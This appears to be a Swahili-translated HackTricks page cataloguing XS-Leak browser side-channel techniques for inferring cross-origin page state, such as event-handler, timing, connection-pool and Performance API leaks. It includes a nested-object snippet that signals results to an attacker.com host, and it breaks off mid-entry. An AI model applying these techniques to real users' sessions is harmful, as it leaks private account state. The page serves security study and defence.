.. | ||
css-injection | ||
connection-pool-by-destination-example.md | ||
connection-pool-example.md | ||
cookie-bomb-+-onerror-xs-leak.md | ||
event-loop-blocking-+-lazy-images.md | ||
javascript-execution-xs-leak.md | ||
performance.now-+-force-heavy-task.md | ||
performance.now-example.md | ||
README.md | ||
url-max-length-client-side.md |
XS-Search/XS-Leaks
Tumia **** kujenga na kujiendesha kiotomatiki kazi zinazotolewa na zana za jamii zilizoendelea zaidi duniani.
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Taarifa za Msingi
XS-Search ni mbinu inayotumika kwa kuchota taarifa za cross-origin kwa kutumia udhaifu wa njia za pembeni.
Vipengele muhimu vinavyohusika katika shambulio hili ni pamoja na:
- Mtandao wa Udhaifu: Tovuti lengwa ambayo taarifa inakusudiwa kuchotwa.
- Mtandao wa Mshambuliaji: Tovuti mbaya iliyoundwa na mshambuliaji, ambayo mwathirika anatembelea, ikihifadhi exploit.
- Mbinu ya Kujumuisha: Mbinu inayotumika kuingiza Mtandao wa Udhaifu katika Mtandao wa Mshambuliaji (mfano, window.open, iframe, fetch, tag ya HTML yenye href, nk.).
- Mbinu ya Leak: Mbinu zinazotumika kubaini tofauti katika hali ya Mtandao wa Udhaifu kulingana na taarifa zilizokusanywa kupitia mbinu ya kujumuisha.
- Hali: Masharti mawili yanayoweza kutokea ya Mtandao wa Udhaifu, ambayo mshambuliaji anajaribu kutofautisha.
- Tofauti Zinazoweza Kugundulika: Mabadiliko yanayoweza kuonekana ambayo mshambuliaji anategemea ili kubaini hali ya Mtandao wa Udhaifu.
Tofauti Zinazoweza Kugundulika
Vipengele kadhaa vinaweza kuchambuliwa ili kutofautisha hali za Mtandao wa Udhaifu:
- Nambari ya Hali: Kutofautisha kati ya nambari mbalimbali za majibu ya HTTP cross-origin, kama vile makosa ya seva, makosa ya mteja, au makosa ya uthibitishaji.
- Matumizi ya API: Kutambua matumizi ya Web APIs kati ya kurasa, ikifunua ikiwa ukurasa wa cross-origin unatumia API maalum ya JavaScript.
- Mwelekeo: Kugundua mwelekeo kwenda kurasa tofauti, si tu mwelekeo wa HTTP bali pia wale wanaosababishwa na JavaScript au HTML.
- Maudhui ya Ukurasa: Kuangalia mabadiliko katika mwili wa majibu ya HTTP au katika rasilimali ndogo za ukurasa, kama vile idadi ya fremu zilizojumuishwa au tofauti za ukubwa katika picha.
- Header ya HTTP: Kurekodi uwepo au labda thamani ya header maalum ya majibu ya HTTP, ikiwa ni pamoja na headers kama X-Frame-Options, Content-Disposition, na Cross-Origin-Resource-Policy.
- Muda: Kutambua tofauti za muda zinazofanana kati ya hali hizo mbili.
Mbinu za Kujumuisha
- Elements za HTML: HTML inatoa vipengele mbalimbali kwa ajili ya kujumuisha rasilimali za cross-origin, kama vile stylesheets, picha, au scripts, ikilazimisha kivinjari kuomba rasilimali isiyo ya HTML. Mkusanyiko wa vipengele vya HTML vinavyoweza kutumika kwa kusudi hili unaweza kupatikana kwenye https://github.com/cure53/HTTPLeaks.
- Frames: Vipengele kama iframe, object, na embed vinaweza kuingiza rasilimali za HTML moja kwa moja kwenye ukurasa wa mshambuliaji. Ikiwa ukurasa hauna ulinzi wa fremu, JavaScript inaweza kufikia kitu cha fremu kupitia mali ya contentWindow.
- Pop-ups: Mbinu ya
window.open
inafungua rasilimali katika tab au dirisha jipya, ikitoa handle ya dirisha kwa JavaScript kuingiliana na mbinu na mali zinazofuata SOP. Pop-ups, mara nyingi hutumiwa katika uthibitisho wa moja, hupita vizuizi vya fremu na vidakuzi vya rasilimali lengwa. Hata hivyo, vivinjari vya kisasa vinakandamiza uundaji wa pop-up kwa vitendo fulani vya mtumiaji. - Maombi ya JavaScript: JavaScript inaruhusu maombi ya moja kwa moja kwa rasilimali lengwa kwa kutumia XMLHttpRequests au Fetch API. Mbinu hizi zinatoa udhibiti sahihi juu ya ombi, kama vile kuchagua kufuata mwelekeo wa HTTP.
Mbinu za Leak
- Event Handler: Mbinu ya jadi ya leak katika XS-Leaks, ambapo waendeshaji wa matukio kama onload na onerror hutoa taarifa kuhusu mafanikio au kushindwa kwa upakiaji wa rasilimali.
- Ujumbe wa Makosa: Makaratasi ya JavaScript au kurasa maalum za makosa zinaweza kutoa taarifa za leak moja kwa moja kutoka ujumbe wa kosa au kwa kutofautisha kati ya uwepo wake na kutokuwepo.
- Mipaka ya Global: Mipaka ya kimwili ya kivinjari, kama vile uwezo wa kumbukumbu au mipaka mingine iliyowekwa na kivinjari, inaweza kuashiria wakati kigezo kinapofikiwa, ikihudumu kama mbinu ya leak.
- Hali ya Global: Maingiliano yanayoweza kugundulika na hali za global za kivinjari (mfano, kiolesura cha Historia) yanaweza kutumika. Kwa mfano, idadi ya entries katika historia ya kivinjari inaweza kutoa vidokezo kuhusu kurasa za cross-origin.
- Performance API: API hii inatoa maelezo ya utendaji wa ukurasa wa sasa, ikiwa ni pamoja na muda wa mtandao kwa hati na rasilimali zilizopakiwa, ikiruhusu maelezo kuhusu rasilimali zilizohitajika.
- Mali Zinazoweza Kusomwa: Baadhi ya mali za HTML ni zinazoweza kusomwa cross-origin na zinaweza kutumika kama mbinu ya leak. Kwa mfano, mali ya
window.frame.length
inaruhusu JavaScript kuhesabu fremu zilizojumuishwa katika ukurasa wa wavuti cross-origin.
Zana ya XSinator & Karatasi
XSinator ni zana ya kiotomatiki ya kuangalia vivinjari dhidi ya XS-Leaks kadhaa zinazojulikana zilizoelezwa katika karatasi yake: https://xsinator.com/paper.pdf
Unaweza kupata zana hiyo katika https://xsinator.com/
{% hint style="warning" %} XS-Leaks Zilizotengwa: Ilibidi tutenge XS-Leaks zinazotegemea wafanyakazi wa huduma kwani zingeingilia kati ya leaks nyingine katika XSinator. Zaidi ya hayo, tulichagua kutenga XS-Leaks zinazotegemea makosa ya usanidi na makosa katika programu maalum ya wavuti. Kwa mfano, makosa ya usanidi ya CrossOrigin Resource Sharing (CORS), uvujaji wa postMessage au Cross-Site Scripting. Zaidi ya hayo, tulitenga XS-Leaks za muda kwa sababu mara nyingi huwa na ucheleweshaji, kelele na kutokuwa sahihi. {% endhint %}
Tumia Trickest kujenga na kujiendesha kiotomatiki kazi zinazotolewa na zana za jamii zilizoendelea zaidi duniani.
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
Mbinu za Muda
Baadhi ya mbinu zifuatazo zitatumia muda kama sehemu ya mchakato wa kugundua tofauti katika hali zinazowezekana za kurasa za wavuti. Kuna njia tofauti za kupima muda katika kivinjari cha wavuti.
Saa: API ya performance.now() inaruhusu wabunifu kupata vipimo vya muda vya hali ya juu.
Kuna idadi kubwa ya APIs ambazo washambuliaji wanaweza kuzitumia kuunda saa zisizo za moja kwa moja: Broadcast Channel API, Message Channel API, requestAnimationFrame, setTimeout, animations za CSS, na nyingine.
Kwa maelezo zaidi: https://xsleaks.dev/docs/attacks/timing-attacks/clocks.
Mbinu za Waendeshaji wa Matukio
Onload/Onerror
- Mbinu za Kujumuisha: Frames, Elements za HTML
- Tofauti Zinazoweza Kugundulika: Nambari ya Hali
- Maelezo zaidi: https://www.usenix.org/conference/usenixsecurity19/presentation/staicu, https://xsleaks.dev/docs/attacks/error-events/
- Muhtasari: ikiwa unajaribu kupakia rasilimali, matukio ya onerror/onload yanachochewa wakati rasilimali imepakiwa kwa mafanikio/kushindwa, inawezekana kubaini nambari ya hali.
- Mfano wa Kode: https://xsinator.com/testing.html#Event%20Handler%20Leak%20(Script)
{% content-ref url="cookie-bomb-+-onerror-xs-leak.md" %} cookie-bomb-+-onerror-xs-leak.md {% endcontent-ref %}
Mfano wa kode unajaribu kupakia scripts objects kutoka JS, lakini tags nyingine kama objects, stylesheets, picha, sauti zinaweza pia kutumika. Zaidi ya hayo, inawezekana pia kuingiza tag moja kwa moja na kutangaza matukio ya onload
na onerror
ndani ya tag (badala ya kuingiza kutoka JS).
Pia kuna toleo lisilo na script la shambulio hili:
<object data="//example.com/404">
<object data="//attacker.com/?error"></object>
</object>
In this case if example.com/404
is not found attacker.com/?error
will be loaded.
Onload Timing
- Inclusion Methods: HTML Elements
- Detectable Difference: Timing (generally due to Page Content, Status Code)
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events
- Summary: The performance.now() API can be used to measure how much time it takes to perform a request. However, other clocks could be used, such as PerformanceLongTaskTiming API which can identify tasks running for more than 50ms.
- Code Example: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#onload-events another example in:
{% content-ref url="performance.now-example.md" %} performance.now-example.md {% endcontent-ref %}
Onload Timing + Forced Heavy Task
Teknolojia hii ni kama ile ya awali, lakini mshambuliaji pia atachochea hatua fulani kuchukua muda muhimu wakati jibu ni chanya au hasi na kupima muda huo.
{% content-ref url="performance.now-+-force-heavy-task.md" %} performance.now-+-force-heavy-task.md {% endcontent-ref %}
unload/beforeunload Timing
- Inclusion Methods: Frames
- Detectable Difference: Timing (generally due to Page Content, Status Code)
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events
- Summary: The SharedArrayBuffer clock can be used to measure how much time it takes to perform a request. Other clocks could be used.
- Code Example: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#unload-events
Muda unaotumika kupata rasilimali unaweza kupimwa kwa kutumia matukio ya unload
na beforeunload
. Tukio la beforeunload
linatokea wakati kivinjari kinakaribia kuhamia kwenye ukurasa mpya, wakati tukio la unload
linatokea wakati mchakato wa kuhamia unafanyika. Tofauti ya muda kati ya matukio haya mawili inaweza kuhesabiwa ili kubaini muda ambao kivinjari kilitumia kupata rasilimali.
Sandboxed Frame Timing + onload
- Inclusion Methods: Frames
- Detectable Difference: Timing (generally due to Page Content, Status Code)
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks
- Summary: The performance.now() API can be used to measure how much time it takes to perform a request. Other clocks could be used.
- Code Example: https://xsleaks.dev/docs/attacks/timing-attacks/network-timing/#sandboxed-frame-timing-attacks
Imethibitishwa kuwa katika ukosefu wa Framing Protections, muda unaohitajika kwa ukurasa na rasilimali zake ndogo kupakia kupitia mtandao unaweza kupimwa na mshambuliaji. Kipimo hiki kwa kawaida kinawezekana kwa sababu handler ya onload
ya iframe inasababisha tu baada ya kukamilika kwa upakiaji wa rasilimali na utekelezaji wa JavaScript. Ili kupita tofauti iliyosababishwa na utekelezaji wa script, mshambuliaji anaweza kutumia sifa ya sandbox
ndani ya <iframe>
. Kuongeza sifa hii kunakataza kazi nyingi, hasa utekelezaji wa JavaScript, hivyo kuruhusu kipimo ambacho kinategemea zaidi utendaji wa mtandao.
// Example of an iframe with the sandbox attribute
<iframe src="example.html" sandbox></iframe>
#ID + error + onload
- Inclusion Methods: Frames
- Detectable Difference: Page Content
- More info:
- Summary: Ikiwa unaweza kufanya ukurasa uwe na kosa wakati maudhui sahihi yanapofikiwa na kufanya upakuaji ufanyike vizuri wakati maudhui yoyote yanapofikiwa, basi unaweza kuunda mzunguko kutoa taarifa zote bila kupima muda.
- Code Example:
Kufikiria kwamba unaweza kuingiza ukurasa ambao una maudhui ya siri ndani ya Iframe.
Unaweza kufanya mwathirika atafute faili ambayo ina "bendera" kwa kutumia Iframe (kuchochea CSRF kwa mfano). Ndani ya Iframe unajua kwamba tukio la onload litakuwa linatekelezwa kila wakati angalau mara moja. Kisha, unaweza kubadilisha URL ya iframe lakini kubadilisha tu maudhui ya hash ndani ya URL.
Kwa mfano:
- URL1: www.attacker.com/xssearch#try1
- URL2: www.attacker.com/xssearch#try2
Ikiwa URL ya kwanza ilipakuliwa kwa mafanikio, basi, wakati kubadilisha sehemu ya hash ya URL tukio la onload halitazinduliwa tena. Lakini ikiwa ukurasa ulikuwa na aina fulani ya kosa wakati wa upakuaji, basi, tukio la onload litazinduliwa tena.
Kisha, unaweza kutofautisha kati ya ukurasa ulio pakuliwa vizuri au ukurasa ambao una kosa wakati unafikiwa.
Javascript Execution
- Inclusion Methods: Frames
- Detectable Difference: Page Content
- More info:
- Summary: Ikiwa ukurasa unarudisha maudhui ya nyeti, au maudhui ambayo yanaweza kudhibitiwa na mtumiaji. Mtumiaji anaweza kuweka kodhi halali ya JS katika kesi hasi, na kuweka kila jaribio ndani ya
<script>
vitambulisho, hivyo katika kesi hasi kodhi ya washambuliaji inasababisha, na katika kesi chanya hakuna itatekelezwa. - Code Example:
{% content-ref url="javascript-execution-xs-leak.md" %} javascript-execution-xs-leak.md {% endcontent-ref %}
CORB - Onerror
- Inclusion Methods: HTML Elements
- Detectable Difference: Status Code & Headers
- More info: https://xsleaks.dev/docs/attacks/browser-features/corb/
- Summary: Cross-Origin Read Blocking (CORB) ni kipimo cha usalama kinachozuia kurasa za wavuti kupakua rasilimali nyeti za cross-origin ili kulinda dhidi ya mashambulizi kama Spectre. Hata hivyo, washambuliaji wanaweza kutumia tabia yake ya kinga. Wakati jibu linalohusishwa na CORB linaporudisha CORB protected
Content-Type
nanosniff
na msimbo wa hali2xx
, CORB inakata mwili wa jibu na vichwa. Washambuliaji wanaoshuhudia hili wanaweza kudhani mchanganyiko wa msimbo wa hali (unaonyesha mafanikio au kosa) naContent-Type
(inaonyesha ikiwa inprotected na CORB), ikisababisha uvujaji wa taarifa. - Code Example:
Angalia kiungo cha maelezo zaidi kwa maelezo zaidi kuhusu shambulio.
onblur
- Inclusion Methods: Frames
- Detectable Difference: Page Content
- More info: https://xsleaks.dev/docs/attacks/id-attribute/, https://xsleaks.dev/docs/attacks/experiments/portals/
- Summary: Vuja data nyeti kutoka kwa sifa ya id au jina.
- Code Example: https://xsleaks.dev/docs/attacks/id-attribute/#code-snippet
Inawezekana kupakua ukurasa ndani ya iframe na kutumia #id_value
kufanya ukurasa uangalie kwenye kipengele cha iframe kilichotajwa ikiwa, kisha ikiwa ishara ya onblur
itazinduliwa, kipengele cha ID kinapatikana.
Unaweza kufanya shambulio sawa na vitambulisho vya portal
.
postMessage Broadcasts
- Inclusion Methods: Frames, Pop-ups
- Detectable Difference: API Usage
- More info: https://xsleaks.dev/docs/attacks/postmessage-broadcasts/
- Summary: Kusanya taarifa nyeti kutoka kwa postMessage au tumia uwepo wa postMessages kama oracle kujua hali ya mtumiaji kwenye ukurasa
- Code Example:
Any code listening for all postMessages.
Programu mara nyingi hutumia postMessage
broadcasts kuwasiliana kati ya asili tofauti. Hata hivyo, njia hii inaweza bila kukusudia kufichua taarifa nyeti ikiwa parameta ya targetOrigin
haijafafanuliwa vizuri, ikiruhusu dirisha lolote kupokea ujumbe. Zaidi ya hayo, kitendo cha kupokea ujumbe kinaweza kutenda kama oracle; kwa mfano, ujumbe fulani huenda ukatumwa tu kwa watumiaji walioingia. Hivyo, uwepo au ukosefu wa ujumbe hawa unaweza kufichua taarifa kuhusu hali au utambulisho wa mtumiaji, kama vile ikiwa wameidhinishwa au la.
Tumia Trickest kujenga na kujiendesha kazi zinazotolewa na zana za jamii za kisasa zaidi duniani.
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=xs-search" %}
Global Limits Techniques
WebSocket API
- Inclusion Methods: Frames, Pop-ups
- Detectable Difference: API Usage
- More info: https://xsinator.com/paper.pdf (5.1)
- Summary: Kuweka mipaka ya uhusiano wa WebSocket kunavuja idadi ya uhusiano wa WebSocket wa ukurasa wa cross-origin.
- Code Example: https://xsinator.com/testing.html#WebSocket%20Leak%20(FF), https://xsinator.com/testing.html#WebSocket%20Leak%20(GC)
Inawezekana kubaini ikiwa, na ni wangapi, uunganisho wa WebSocket ukurasa wa lengo unatumia. Inaruhusu mshambuliaji kugundua hali za programu na kuvuja taarifa zinazohusiana na idadi ya uhusiano wa WebSocket.
Ikiwa asili moja inatumia idadi kubwa ya vitu vya uhusiano wa WebSocket, bila kujali hali zao za uhusiano, kuunda vitu vipya kutasababisha makosa ya JavaScript. Ili kutekeleza shambulio hili, tovuti ya mshambuliaji inafungua tovuti ya lengo katika pop-up au iframe na kisha, baada ya wavuti ya lengo kupakuliwa, inajaribu kuunda idadi kubwa ya uhusiano wa WebSockets iwezekanavyo. Idadi ya makosa yaliyotupwa ni idadi ya uhusiano wa WebSocket inayotumiwa na dirisha la tovuti ya lengo.
Payment API
- Inclusion Methods: Frames, Pop-ups
- Detectable Difference: API Usage
- More info: https://xsinator.com/paper.pdf (5.1)
- Summary: Gundua Ombi la Malipo kwa sababu moja tu inaweza kuwa hai kwa wakati mmoja.
- Code Example: https://xsinator.com/testing.html#Payment%20API%20Leak
Hii XS-Leak inaruhusu mshambuliaji gundua wakati ukurasa wa cross-origin unapoanzisha ombi la malipo.
Kwa sababu ombile moja la malipo linaweza kuwa hai kwa wakati mmoja, ikiwa tovuti ya lengo inatumia Payment Request API, jaribio lolote la kuonyesha matumizi ya API hii litashindwa, na kusababisha makosa ya JavaScript. Mshambuliaji anaweza kutumia hili kwa kujaribu kuonyesha UI ya Payment API mara kwa mara. Ikiwa jaribio moja linapelekea kosa, tovuti ya lengo kwa sasa inatumia hiyo. Mshambuliaji anaweza kuficha jaribio hizi za mara kwa mara kwa kufunga UI mara moja baada ya kuunda.
Timing the Event Loop
- Inclusion Methods:
- Detectable Difference: Timing (generally due to Page Content, Status Code)
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#timing-the-event-loop
- Summary: Pima muda wa utekelezaji wa wavuti kwa kutumia mzunguko wa tukio wa JS wa nyuzi moja.
- Code Example:
{% content-ref url="event-loop-blocking-+-lazy-images.md" %} event-loop-blocking-+-lazy-images.md {% endcontent-ref %}
JavaScript inafanya kazi kwenye mzunguko wa tukio wa nyuzi moja mfano wa ushirikiano, ikimaanisha kwamba inaweza kutekeleza kazi moja tu kwa wakati. Sifa hii inaweza kutumika kupima ni muda gani kodhi kutoka kwa asili tofauti inachukua kutekeleza. Mshambuliaji anaweza kupima muda wa utekelezaji wa kodhi yao wenyewe katika mzunguko wa tukio kwa kutuma matukio kwa kuendelea na mali zilizowekwa. Matukio haya yatachakatwa wakati hifadhi ya matukio iko tupu. Ikiwa asili nyingine pia inatuma matukio kwenye hifadhi hiyo hiyo, mshambuliaji anaweza kudhani muda inachukua kwa matukio haya ya nje kutekelezwa kwa kuangalia ucheleweshaji katika utekelezaji wa kazi zao wenyewe. Njia hii ya kufuatilia mzunguko wa tukio kwa ucheleweshaji inaweza kufichua muda wa utekelezaji wa kodhi kutoka kwa asili tofauti, ikifichua taarifa nyeti.
{% hint style="warning" %} Katika kupima muda wa utekelezaji inawezekana kuondoa mambo ya mtandao ili kupata vipimo sahihi zaidi. Kwa mfano, kwa kupakua rasilimali zinazotumiwa na ukurasa kabla ya kuziweka. {% endhint %}
Busy Event Loop
- Inclusion Methods:
- Detectable Difference: Timing (generally due to Page Content, Status Code)
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/execution-timing/#busy-event-loop
- Summary: Njia moja ya kupima muda wa utekelezaji wa operesheni ya wavuti inahusisha kuzuia kwa makusudi mzunguko wa tukio wa nyuzi moja na kisha kupima ni muda gani inachukua kwa mzunguko wa tukio kuwa upatikani tena. Kwa kuingiza operesheni ya kuzuia (kama vile hesabu ndefu au wito wa API wa synchronous) kwenye mzunguko wa tukio, na kufuatilia muda inachukua kwa kodhi inayofuata kuanza kutekelezwa, mtu anaweza kudhani muda wa kazi ambazo zilikuwa zikitekelezwa katika mzunguko wa tukio wakati wa kipindi cha kuzuia. Mbinu hii inatumia asili ya nyuzi moja ya mzunguko wa tukio wa JavaScript, ambapo kazi zinafanywa kwa mpangilio, na inaweza kutoa maarifa kuhusu utendaji au tabia ya operesheni nyingine zinazoshiriki nyuzi hiyo hiyo.
- Code Example:
Faida kubwa ya mbinu ya kupima muda wa utekelezaji kwa kufunga mzunguko wa tukio ni uwezo wake wa kukwepa Kujitenga kwa Tovuti. Kujitenga kwa Tovuti ni kipengele cha usalama kinachotenganisha tovuti tofauti katika michakato tofauti, lengo lake ni kuzuia tovuti zenye uharibifu kupata moja kwa moja data nyeti kutoka tovuti nyingine. Hata hivyo, kwa kuathiri muda wa utekelezaji wa asili nyingine kupitia mzunguko wa tukio wa pamoja, mshambuliaji anaweza kwa njia isiyo ya moja kwa moja kutoa taarifa kuhusu shughuli za asili hiyo. Njia hii haitegemei ufikiaji wa moja kwa moja wa data ya asili nyingine bali inatazama athari za shughuli za asili hiyo kwenye mzunguko wa tukio wa pamoja, hivyo kukwepa vizuizi vya kinga vilivyowekwa na Kujitenga kwa Tovuti.
{% hint style="warning" %} Katika kupima muda wa utekelezaji inawezekana kuondoa mambo ya mtandao ili kupata vipimo sahihi zaidi. Kwa mfano, kwa kupakua rasilimali zinazotumiwa na ukurasa kabla ya kuziweka. {% endhint %}
Connection Pool
- Inclusion Methods: JavaScript Requests
- Detectable Difference: Timing (generally due to Page Content, Status Code)
- More info: https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/
- Summary: Mshambuliaji anaweza kufunga soketi zote isipokuwa 1, kupakua wavuti ya lengo na kwa wakati mmoja kupakua ukurasa mwingine, muda hadi ukurasa wa mwisho unaanza kupakua ni muda ambao ukurasa wa lengo ulitumia kupakua.
- Code Example:
{% content-ref url="connection-pool-example.md" %} connection-pool-example.md {% endcontent-ref %}
Vivinjari vinatumia soketi kwa mawasiliano ya seva, lakini kutokana na rasilimali zilizopunguka za mfumo wa uendeshaji na vifaa, vivinjari vinapaswa kuweka mipaka kwenye idadi ya soketi zinazofanya kazi kwa wakati mmoja. Washambuliaji wanaweza kutumia kikomo hiki kupitia hatua zifuatazo:
- Tambua kikomo cha soketi cha kivinjari, kwa mfano, soketi 256 za kimataifa.
- Jaza soketi 255 kwa muda mrefu kwa kuanzisha ombi 255 kwa mwenyeji tofauti, iliyoundwa kuweka uhusiano wazi bila kukamilisha.
- Tumia soketi ya 256 kutuma ombi kwa ukurasa wa lengo.
- Jaribu ombi la 257 kwa mwenyeji tofauti. Kwa kuwa soketi zote zinatumika (kama ilivyo katika hatua 2 na 3), ombi hili litakuwa kwenye foleni hadi soketi ipatikane. Ucheleweshaji kabla ya ombi hili kuendelea unampa mshambuliaji taarifa za muda kuhusu shughuli za mtandao zinazohusiana na soketi ya 256 (soketi ya ukurasa wa lengo). Ufafanuzi huu unapatikana kwa sababu soketi 255 kutoka hatua 2 bado zinatumika, ikimaanisha kwamba soketi yoyote mpya inayopatikana lazima iwe ile iliyotolewa kutoka hatua 3. Muda inachukua kwa soketi ya 256 kuwa upatikani hivyo unahusishwa moja kwa moja na muda unaohitajika kwa ombi la ukurasa wa lengo kukamilika.
Kwa maelezo zaidi: https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/
Connection Pool by Destination
- Inclusion Methods: JavaScript Requests
- Detectable Difference: Timing (generally due to Page Content, Status Code)
- More info:
- Summary: Ni kama mbinu ya awali lakini badala ya kutumia soketi zote, Google Chrome inaweka kikomo cha ombile 6 zinazofanya kazi kwa asili moja. Ikiwa tuta zuia 5 na kisha kuanzisha ombi la 6 tunaweza kupima na ikiwa tumeweza kufanya ukurasa wa mwathirika utume ombi zaidi kwa mwisho sawa ili kugundua hali ya ukurasa, ombile la 6 litachukua muda mrefu na tunaweza kuligundua.
Performance API Techniques
Performance API
inatoa maarifa kuhusu vipimo vya utendaji wa programu za wavuti, zaidi ya hayo inaboreshwa na Resource Timing API
. Resource Timing API inaruhusu kufuatilia muda wa maombi ya mtandao kwa undani, kama vile muda wa maombi. Kwa kuzingatia, wakati seva zinajumuisha kichwa cha Timing-Allow-Origin: *
katika majibu yao, data zaidi kama vile ukubwa wa uhamisho na muda wa kutafuta jina la kikoa inapatikana.
Hii data nyingi inaweza kupatikana kupitia mbinu kama performance.getEntries
au performance.getEntriesByName
, ikitoa mtazamo wa kina wa taarifa zinazohusiana na utendaji. Zaidi ya hayo, API inarahisisha kupima muda wa utekelezaji kwa kuhesabu tofauti kati ya alama za muda zinazopatikana kutoka performance.now()
. Hata hivyo, inapaswa kuzingatiwa kwamba kwa shughuli fulani katika vivinjari kama Chrome, usahihi wa performance.now()
unaweza kuwa na mipaka hadi milisekunde, ambayo inaweza kuathiri undani wa vipimo vya muda.
Mbali na vipimo vya muda, Performance API inaweza kutumika kwa maarifa yanayohusiana na usalama. Kwa mfano, uwepo au ukosefu wa kurasa katika kitu cha performance
katika Chrome unaweza kuashiria matumizi ya X-Frame-Options
. Kwa haswa, ikiwa ukurasa umezuia kuonyeshwa katika fremu kutokana na X-Frame-Options
, hautarekodiwa katika kitu cha performance
, ikitoa kidokezo kidogo kuhusu sera za uwasilishaji wa ukurasa.
Error Leak
- Inclusion Methods: Frames, HTML Elements
- Detectable Difference: Status Code
- More info: https://xsinator.com/paper.pdf (5.2)
- Summary: Ombi linalosababisha makosa halitaunda kipengee cha muda wa rasilimali.
- Code Example: https://xsinator.com/testing.html#Performance%20API%20Error%20Leak
Inawezekana kutofautisha kati ya msimbo wa hali wa majibu ya HTTP kwa sababu maombi yanayosababisha kosa hayaundai kipengee cha utendaji.
Style Reload Error
- Inclusion Methods: HTML Elements
- Detectable Difference: Status Code
- More info: https://xsinator.com/paper.pdf (5.2)
- Summary: Kutokana na hitilafu ya kivinjari, maombi yanayosababisha makosa yanapakiwa mara mbili.
- Code Example: https://xsinator.com/testing.html#Style%20Reload%20Error%20Leak
Katika mbinu ya awali pia iligundulika kesi mbili ambapo hitilafu za kivinjari katika GC zinapelekea rasilimali kupakuliwa mara mbili wakati hazijafanikiwa kupakuliwa. Hii itasababisha kuingia nyingi katika Performance API na hivyo inaweza kugundulika.
Request Merging Error
- Inclusion Methods: HTML Elements
- Detectable Difference: Status Code
- More info: https://xsinator.com/paper.pdf (5.2)
- Summary: Maombi yanayosababisha kosa hayawezi kuunganishwa.
- Code Example: https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak
Mbinu hii ilipatikana katika jedwali katika karatasi iliyoelezwa lakini hakuna maelezo ya mbinu hiyo ilipatikana. Hata hivyo, unaweza kupata msimbo wa chanzo ukikagua katika https://xsinator.com/testing.html#Request%20Merging%20Error%20Leak
Empty Page Leak
- Inclusion Methods: Frames
- Detectable Difference: Page Content
- More info: https://xsinator.com/paper.pdf (5.2)
- Summary: Majibu yasiyo na maudhui hayaundai kipengee cha muda wa rasilimali.
- Code Example: https://xsinator.com/testing.html#Performance%20API%20Empty%20Page%20Leak
Mshambuliaji anaweza kugundua ikiwa ombi limesababisha mwili wa jibu wa HTTP kuwa tupu kwa sababu kurasa tupu hazaundai kipengee cha utendaji katika vivinjari vingine.
XSS-Auditor Leak
- Inclusion Methods: Frames
- Detectable Difference: Page Content
- More info: https://xsinator.com/paper.pdf (5.2)
- Summary: Kutumia XSS Auditor katika Madai ya Usalama, washambuliaji wanaweza kugundua vipengele maalum vya ukurasa wa wavuti kwa kuangalia mabadiliko katika majibu wakati payloads zilizoundwa zinachochea mfumo wa filtering wa auditor.
- Code Example: https://xsinator.com/testing.html#Performance%20API%20XSS%20Auditor%20Leak
Katika Madai ya Usalama (SA), XSS Auditor, iliyokusudiwa awali kuzuia mashambulizi ya Cross-Site Scripting (XSS), inaweza kwa njia ya ajabu kutumika kuvuja taarifa nyeti. Ingawa kipengele hiki kilijengwa kimeondolewa kutoka Google Chrome (GC), bado kinapatikana katika SA. Mnamo mwaka wa 2013, Braun na Heiderich walionyesha kwamba XSS Auditor inaweza bila kukusudia kuzuia skripti halali, na kusababisha matokeo ya uwongo. Kwa kujenga juu ya hili, watafiti walitengeneza mbinu za kutoa taarifa na kugundua maudhui maalum kwenye kurasa za cross-origin, dhana inayojulikana kama XS-Leaks, iliyoanzishwa na Terada na kuendelezwa na Heyes katika chapisho la blogu. Ingawa mbinu hizi zilikuwa maalum kwa XSS Auditor katika GC, iligundulika kwamba katika SA, kurasa zilizozuiwa na XSS Auditor hazizalishi kuingia katika Performance API, ikifichua njia ambayo taarifa nyeti inaweza bado kuvuja.
X-Frame Leak
- Inclusion Methods: Frames
- Detectable Difference: Header
- More info: https://xsinator.com/paper.pdf (5.2), https://xsleaks.github.io/xsleaks/examples/x-frame/index.html, https://xsleaks.dev/docs/attacks/timing-attacks/performance-api/#detecting-x-frame-options
- Summary: Rasilimali yenye kichwa cha X-Frame-Options haizalishi kipengee cha muda wa rasilimali.
- Code Example: https://xsinator.com/testing.html#Performance%20API%20X-Frame%20Leak
Ikiwa ukurasa haukubaliwi kuonyeshwa katika iframe hauzali kipengee cha utendaji. Kama matokeo, mshambuliaji anaweza kugundua kichwa cha jibu X-Frame-Options
.
Vivyo hivyo inatokea ikiwa unatumia embed tag.
Download Detection
- Inclusion Methods: Frames
- Detectable Difference: Header
- More info: https://xsinator.com/paper.pdf (5.2)
- Summary: Upakuaji hauzali kipengee cha muda wa rasilimali katika Performance API.
- Code Example: https://xsinator.com/testing.html#Performance%20API%20Download%20Detection
Kama ilivyo kwa XS-Leak iliyoelezwa, rasilimali inayopakuliwa kwa sababu ya kichwa cha ContentDisposition, pia haizalishi kipengee cha utendaji. Mbinu hii inafanya kazi katika vivinjari vyote vikuu.
Redirect Start Leak
- Inclusion Methods: Frames
- Detectable Difference: Redirect
